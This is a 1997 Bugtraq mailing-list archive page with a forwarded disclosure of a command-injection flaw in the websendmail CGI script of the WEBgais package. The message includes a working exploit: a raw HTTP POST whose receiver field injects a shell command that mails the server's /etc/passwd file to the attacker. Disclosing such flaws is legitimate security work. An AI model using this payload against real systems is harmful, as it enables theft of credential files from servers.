Bugtraq mailing list archives
Vulnerability in websendmail (fwd)
From: proff () SUBURBIA NET (Julian Assange)
Date: Tue, 8 Jul 1997 06:44:45 +1000
From best-of-security-request () suburbia net Tue Jul 8 06:37:42 1997
Return-Path: <best-of-security-request () suburbia net> Received: (from list@localhost) by suburbia.net (8.8.4/8.8.4) id GAA11901 for proff () suburbia net; Tue, 8 Jul 1997 06:37:42 +1000 (EST) Received: (qmail 11893 invoked from network); 7 Jul 1997 20:37:36 -0000 Received: from pop3.kappa.ro (drazvan@193.226.102.17) by suburbia.net with SMTP; 7 Jul 1997 20:37:36 -0000 Received: from localhost (drazvan@localhost) by pop3.kappa.ro (8.8.5/8.7.3) with SMTP id XAA16131 for <best-of-security () suburbia net>; Mon, 7 Jul 1997 23:41:02 +0300 Date: Mon, 7 Jul 1997 23:41:02 +0300 (EET DST) From: Razvan Dragomirescu <drazvan () kappa ro> To: best-of-security () suburbia net Subject: Vulnerability in websendmail Message-ID: <Pine.LNX.3.95.970707233511.16089C-100000 () pop3 kappa ro> Hi, First, the story: Websendmail is a cgi-bin that comes with the WEBgais package, which is an interface to the GAIS search tool. It is a PERL script that reads input from a form and sends e-mail to the specified destination. The version I am referring to is 1.0. It was released in 1995 but it is still used (I've just tested it :) ). As many other cgi-bin programs, this one does not check for special characters in the user input. Here's what it does: (...) $cmd="| $MAILBIN $VAR_receiver"; open (PIPEOUT, $cmd); $VAR_receiver is read from the form. The script also does a little parsing on the string to "un-webify" it (converts pluses to spaces and %xx characters to their real value). So if we set $VAR_receiver to ';mail+your_address\@somewhere.org</etc/passwd;' it will do the job. Now for the exploit: telnet target.machine.com 80 POST /cgi-bin/websendmail HTTP/1.0 Content-length: xxx (should be replaced with the actual length of the string passed to the server, in this case xxx=90) receiver=;mail+your_address\@somewhere.org</etc/passwd;&sender=a&rtnaddr=a&subject=a &content=a Don't worry if the server displays an error message. The password file is on the way :). You can use anything for the "sender", "rtnaddr", "subject" and "content", just make sure they're there, the script checks for them. That would be all. I'm expecting to hear from you. Be good. Razvan -- Razvan Dragomirescu drazvan () kappa ro, drazvan () romania ro, drazvan () roedu net Phone: +40-1-6866621 "Smile, tomorrow will be worse" (Murphy)
Current thread:
- Re: Solaris 2.5.1 party piece Davin Milun (Jul 03)
- Re: Solaris 2.5.1 party piece Casper Dik (Jul 03)
- Vulnerability in websendmail Razvan Dragomirescu (Jul 04)
- tar-error inter (Jul 05)
- Solution to MacDNS problem (keywords MacDNS DNS Macintosh Dan Brown (Jul 07)
- Vulnerability in websendmail (fwd) Julian Assange (Jul 07)
- Alert: Utility allows any user to become a member of local Admini Aleph One (Jul 08)
- Re: Vulnerability in websendmail Randal Schwartz (Jul 08)
- SGI Security Advisory 19970502-02-PX - xlock Vulnerability SGI Security Coordinator (Jul 08)
- Buffer Overflows exploit for SunOS 4.1.4 Willy TARREAU (Jul 08)
- GetAdmin NT exploit Christopher Klaus (Jul 08)
- Inside GetAdmin Mark Joseph Edwards (Jul 08)
- Fw: Reported Proxy-Netscape Bug Mark Joseph Edwards (Jul 08)